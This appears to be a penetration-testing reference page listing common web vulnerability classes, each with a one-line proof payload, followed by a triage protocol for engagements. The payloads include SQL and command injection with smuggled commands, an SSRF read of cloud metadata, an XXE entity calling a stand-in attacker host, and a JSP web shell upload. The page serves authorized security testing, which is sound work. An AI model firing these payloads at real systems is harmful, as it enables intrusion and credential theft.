New The 2026 Continuous Validation Methodology Paper is now available. Read the paper →
Featured · 2 Application & Identity Security

Common Web Vulnerabilities.

The canonical vulnerability catalog: every class with at least one concrete proof-pattern. The single most-cited entry in the index.

Minimum proof-pattern per class

  • Reflected XSS. ?q=<svg/onload=alert(1)> reflected unencoded in HTML context. Confirms HTML injection without breaking the page.
  • Stored XSS. Same payload submitted via form, retrieved on second page-load by a different user. Source ≠ sink is the proof.
  • SQL injection. id=1' AND SLEEP(5)-- with 5-second response delay. Time-based confirms without leaking data.
  • NoSQL injection. JSON body with {"user":"admin","pass":{"$ne":""}} → authenticated as admin. Mongo's most common foot-gun.
  • Command injection. ?host=127.0.0.1;sleep%205 on a ping endpoint, response delayed 5s. Always start with time-based, never with data exfil.
  • SSRF. ?url=http://169.254.169.254/latest/meta-data/ returns instance metadata. Cloud-specific proof, less ambiguous than internal-network reach.
  • Untrusted deserialization (Java). ysoserial CommonsCollections5 payload → DNS callback to attacker domain. Proves code execution without writing files.
  • XXE. <!ENTITY xxe SYSTEM "http://attacker/p"> in XML body → HTTP callback received. Out-of-band variant proves the parser fetched.
  • File upload to RCE. Upload shell.jsp.png, request /uploads/shell.jsp.png → executes as JSP because of double-extension or MIME mishandling.
  • IDOR. User A creates resource /api/orders/1234, User B requests same URL → 200 OK with A's data. Two test accounts are mandatory for the proof.
  • CSRF. Action endpoint accepts POST without anti-CSRF token. Submit form from attacker-origin HTML, action executes.
  • Open redirect. ?next=//evil.com issues a 302 to attacker host. Useful as a chain element, weak finding standalone.
  • Subdomain takeover. DNS CNAME points to a SaaS host that doesn't claim the record. Register the resource on the SaaS → serve attacker content under target domain.

Triage protocol when scope is huge and intel is zero

  1. Run the catalog top-to-bottom against any reachable surface. One probe per class, minute-long timeouts, log everything.
  2. Anything that comes back with a non-baseline response → flag for manual follow-up. Don't deep-dive in the first pass.
  3. After full sweep, sort flags by exploitability × impact. Take the top three; ignore the rest until those are exhausted.
  4. For each, build the full chain (proof → impact → remediation). Move on only when written up.
Rule of thumbA proof-pattern that doesn't break the page is worth more than one that does. Time-based and out-of-band proofs survive WAFs, satisfy the client's reproducer, and don't trigger user-visible errors during testing.

Related notes in this domain

From reference to evidence

Run this against your own environment.